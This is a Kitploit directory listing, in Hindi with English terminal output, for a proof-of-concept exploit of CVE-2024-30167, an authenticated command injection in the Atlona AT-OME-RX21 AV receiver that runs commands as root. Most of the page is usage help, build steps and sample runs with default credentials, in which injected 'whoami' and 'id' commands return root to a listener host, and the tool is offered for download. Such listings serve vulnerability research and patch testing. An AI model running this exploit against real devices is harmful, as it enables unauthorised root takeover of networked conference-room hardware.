Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/rizzziom/cve-2024-30167
एम्बेडेड सिस्टम सुरक्षाभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोल
GitHubrizzziom/cve-2024-30167

CVE-2024-30167

एटलोना AT-OME-RX21 में प्रमाणित कमांड इंजेक्शन के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो समय कॉन्फ़िगरेशन इंटरफ़ेस के माध्यम से रूट-स्तरीय कमांड निष्पादन की अनुमति देता है।

रिपॉजिटरी देखें
128 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Atlona OME प्रमाणित कमांड इंजेक्शन के लिए PoC

अस्वीकरण: यह प्रूफ ऑफ कॉन्सेप्ट केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इस कोड का उपयोग उन सिस्टमों पर न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है। मैं किसी भी दुरुपयोग के लिए जिम्मेदार नहीं हूँ।

Atlona AT-OME-RX21 AV स्विचर के समय कॉन्फ़िगरेशन इंटरफ़ेस में एक प्रमाणित कमांड इंजेक्शन भेद्यता मौजूद है। वैध क्रेडेंशियल वाला उपयोगकर्ता ऑपरेटिंग सिस्टम कमांड इंजेक्ट कर सकता है जो root के रूप में निष्पादित होते हैं, जिससे पूर्ण सिस्टम से समझौता हो जाता है।

उत्पाद जानकारी

Atlona AT-OME-RX21 एक AV (ऑडियो/विज़ुअल) रिसीवर और स्केलर है जो पेशेवर वीडियो कॉन्फ्रेंसिंग और सहयोग वातावरण के लिए डिज़ाइन किया गया है। इसका उपयोग ज्यादातर कॉन्फ्रेंस रूम, कक्षाओं और हडल स्पेस में किया जाता है। यह लैपटॉप/कॉन्फ्रेंसिंग सिस्टम जैसे उपकरणों को डिस्प्ले से जोड़ने में मदद करता है।

यह PoC सभी फर्मवेयर संस्करणों <= 1.5.1 के विरुद्ध काम करता है

विक्रेता जानकारी: https://atlona.com/product/at-ome-rx21/

उपयोग

root@kitploit:~
$ .\cve-2024-30167.exe -h


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Usage of cve-2024-30167.exe:
  -P string
        listening port for command output (default "4444")
  -c string
        Command to execute on the target
  -l string
        listening host for command output
  -p string
        Password for authentication (default "Atlona")
  -t string
        Target URL (e.g: http://example.com)
  -u string
        Username for authentication (default "admin")
  1. अपने सिस्टम के लिए एक बाइनरी बनाएँ
root@kitploit:~
go build -o <OUTPUT_FILENAME>
  1. लक्ष्य Atlona डिवाइस के विरुद्ध एक्सप्लॉइट चलाएँ
root@kitploit:~
$ .\cve-2024-30167.exe -P 8000 -c 'whoami' -l 192.168.1.100 -t http://192.168.1.103:1337


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
root

$ .\cve-2024-30167.exe -P 8000 -c 'id' -l 192.168.1.100 -t http://192.168.1.103:1337    


▄█████ ██  ██ ██████    ████▄  ▄██▄ ████▄ ██  ██    ████▄  ▄██▄ ▄██ ▄██▀▀▀ ██████ 
██     ██▄▄██ ██▄▄   ▄▄▄ ▄██▀ ██  ██ ▄██▀ ▀█████ ▄▄▄ ▄▄██ ██  ██ ██ ██▄▄▄    ▄██▀ 
▀█████  ▀██▀  ██▄▄▄▄    ███▄▄  ▀██▀ ███▄▄     ██    ▄▄▄█▀  ▀██▀  ██ ▀█▄▄█▀  ██▀   

                        PoC by: github.com/RIZZZIOM

Listening on 192.168.1.100:8000 for response...
Command Injection Successful

=====Received Response=====
uid=0(root) gid=0(root) groups=0(root)

उपरोक्त कमांड डिवाइस में लॉग इन करने के लिए डिफ़ॉल्ट क्रेडेंशियल का उपयोग करता है।

सिंटैक्स:

root@kitploit:~
.\cve=2024-30167.exe -P <listening_port> -c <command> -l <listener_host> -t <target_uri> -u <username> -p <password>

टूल डाउनलोड करें